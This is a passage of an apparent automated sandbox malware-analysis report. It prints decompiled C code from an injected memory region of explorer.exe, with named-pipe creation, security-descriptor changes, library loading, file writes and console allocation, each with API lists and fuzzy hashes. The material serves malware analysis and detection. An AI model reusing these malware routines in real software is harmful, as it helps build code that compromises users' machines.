				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0xc2fab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0xc2fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0xc2fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0xc2fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}















                            0x0008bc81
                            0x0008bc84
                            0x0008bc8f
                            0x0008bc92
                            0x0008bc95
                            0x0008bc98
                            0x0008bc9b
                            0x0008bca1
                            0x0008bca5
                            0x0008bca8
                            0x0008bca9
                            0x0008bcab
                            0x0008bcac
                            0x0008bcb9
                            0x0008bcbe
                            0x0008bcc2
                            0x0008bcc6
                            0x0008bcc7
                            0x0008bccc
                            0x0008bcd7
                            0x0008bcd9
                            0x0008bcdc
                            0x0008bce1
                            0x0008bce2
                            0x0008bce3
                            0x0008bce4
                            0x0008bce6
                            0x0008bce8
                            0x0008bcf1
                            0x0008bcf3
                            0x0008bcf3
                            0x0008bcf1
                            0x0008bcf4
                            0x0008bcfd
                            0x0008bcfd
                            0x0008bd04
                            0x0008bd0f

                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
                            • SetSecurityInfo.ADVAPI32(000001FC,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Security$Descriptor$ConvertInfoString
                            • String ID:
                            • API String ID: 3187949549-0
                            • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                            • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










                            0x0008e1bf
                            0x0008e1c2
                            0x0008e1c8
                            0x0008e1ca
                            0x0008e1cf
                            0x0008e1d1
                            0x0008e1db
                            0x0008e1dc
                            0x0008e1eb
                            0x0008e1de
                            0x0008e1de
                            0x0008e1de
                            0x0008e1ef
                            0x0008e1f6
                            0x0008e1fc
                            0x0008e1fc
                            0x0008e201
                            0x0008e20c

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                            • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 65%
                            			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0xc2f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























                            0x00082c9e
                            0x00082ca0
                            0x00082ca3
                            0x00082ca9
                            0x00082cb2
                            0x00082d36
                            0x00082d3b
                            0x00082d3c
                            0x00082d3e
                            0x00082d8f
                            0x00082d40
                            0x00082d46
                            0x00082d50
                            0x00082d55
                            0x00082d5a
                            0x00082d5d
                            0x00082d5e
                            0x00082d63
                            0x00082d64
                            0x00082d65
                            0x00082d6c
                            0x00082d6d
                            0x00082d7a
                            0x00082d80
                            0x00082d85
                            0x00082cb4
                            0x00082cb9
                            0x00082cbe
                            0x00082ccc
                            0x00082cd0
                            0x00082cd5
                            0x00082cdb
                            0x00082cdd
                            0x00082ced
                            0x00082cf2
                            0x00082cf7
                            0x00082cfa
                            0x00082cfb
                            0x00082d00
                            0x00082d01
                            0x00082d02
                            0x00082d0f
                            0x00082d15
                            0x00082cdf
                            0x00082ce4
                            0x00082ce4
                            0x00082d21
                            0x00082d26
                            0x00082d93
                            0x00082d96
                            0x00082d9d
                            0x00082da1
                            0x00082da9
                            0x00082dbc
                            0x00082dc1
                            0x00082dc5
                            0x00082da9
                            0x00082dca

                            APIs
                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectory
                            • String ID:
                            • API String ID: 4241100979-0
                            • Opcode ID: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                            • Opcode Fuzzy Hash: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0xc2f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















                            0x000831c2
                            0x000831c8
                            0x000831d8
                            0x000831dd
                            0x000831df
                            0x000831e4
                            0x000831f5
                            0x000831fa
                            0x00083200
                            0x00083202
                            0x0008320b
                            0x00083210
                            0x00083213
                            0x00083215
                            0x00083217
                            0x00083219
                            0x0008321a
                            0x0008321a
                            0x00083227
                            0x0008322a
                            0x0008322f
                            0x00083249
                            0x0008324f
                            0x00083254
                            0x00083257
                            0x00083263
                            0x00083271
                            0x00083278
                            0x0008327a
                            0x00000000
                            0x00000000
                            0x0008327c
                            0x00083287
                            0x0008328a
                            0x00000000
                            0x00083259
                            0x00083259
                            0x0008325f
                            0x0008328c
                            0x0008328c
                            0x0008328d
                            0x00083293
                            0x00000000
                            0x0008329c
                            0x00083257
                            0x00083204
                            0x00000000
                            0x00083204
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                            • Opcode Fuzzy Hash: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

















                            0x00085aff
                            0x00085aff
                            0x00085b0a
                            0x00085b0c
                            0x00085b12
                            0x00085b18
                            0x00085b22
                            0x00085b2b
                            0x00085b36
                            0x00085b41
                            0x00085b47
                            0x00085b4f
                            0x00085b4f
                            0x00085b55
                            0x00085b5b
                            0x00085b5e
                            0x00085b69
                            0x00085b71
                            0x00085b73
                            0x00085b78
                            0x00085b98
                            0x00085b9f
                            0x00000000
                            0x00085ba1
                            0x00085ba1
                            0x00085ba1
                            0x00085b7a
                            0x00085b7a
                            0x00085b7c
                            0x00085b80
                            0x00000000
                            0x00085b82
                            0x00085b82
                            0x00085b85
                            0x00085b8b
                            0x00085b8e
                            0x00000000
                            0x00085b90
                            0x00000000
                            0x00085b90
                            0x00000000
                            0x00085b8e
                            0x00085b96
                            0x00085ba6
                            0x00085ba8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00085b96
                            0x00085b80
                            0x00085bad
                            0x00085bb0
                            0x00085bb8
                            0x00085bc3

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateDriveHeapType
                            • String ID:
                            • API String ID: 414167704-0
                            • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                            • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0xc0f318
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0xc0f318
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








                            0x0008e453
                            0x0008e454
                            0x0008e45c
                            0x0008e4a6
                            0x0008e4b3
                            0x0008e4b8
                            0x00000000
                            0x0008e45e
                            0x0008e463
                            0x0008e46a
                            0x0008e473
                            0x0008e47a
                            0x0008e481
                            0x0008e485
                            0x0008e4bd
                            0x0008e4c0
                            0x0008e487
                            0x0008e499
                            0x0008e499
                            0x0008e485

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AgentAllocateFreeObtainStringUser
                            • String ID:
                            • API String ID: 471734292-0
                            • Opcode ID: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                            • Opcode Fuzzy Hash: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                            0x0008a65c
                            0x0008a65f
                            0x0008a660
                            0x0008a663
                            0x0008a665
                            0x0008a668
                            0x0008a66d
                            0x0008a69e
                            0x0008a6a0
                            0x0008a66f
                            0x0008a66f
                            0x0008a66f
                            0x0008a691
                            0x00000000
                            0x00000000
                            0x0008a693
                            0x0008a696
                            0x0008a69c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008a69c
                            0x0008a6a5
                            0x0008a6a5
                            0x0008a6a1
                            0x0008a6a4

                            APIs
                            • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                            • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                            0x0008a601
                            0x0008a615
                            0x0008a61a
                            0x0008a623
                            0x0008a625
                            0x0008a62f
                            0x0008a62f
                            0x00000000
                            0x0008a635
                            0x00000000

                            APIs
                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                            • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00083017, Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00083017() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E0008BB20(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
						return 0;
					}
				}
			}






                            0x00083017
                            0x00083023
                            0x0008304e
                            0x00083051
                            0x00083025
                            0x00083025
                            0x0008302c
                            0x00000000
                            0x0008302e
                            0x00083033
                            0x00083039
                            0x00083045
                            0x0008304d
                            0x0008304d
                            0x0008302c

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocConsole
                            • String ID:
                            • API String ID: 4167703944-0
                            • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                            • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
                            • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                            • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                            0x0008a64f
                            0x0008a652
                            0x0008a657
                            0x0008a65b

                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                            • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




                            0x00088612
                            0x00088619

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                            • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                            0x0008b27c

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                            • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




                            0x000885f8
                            0x000885fe
                            0x00088603

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
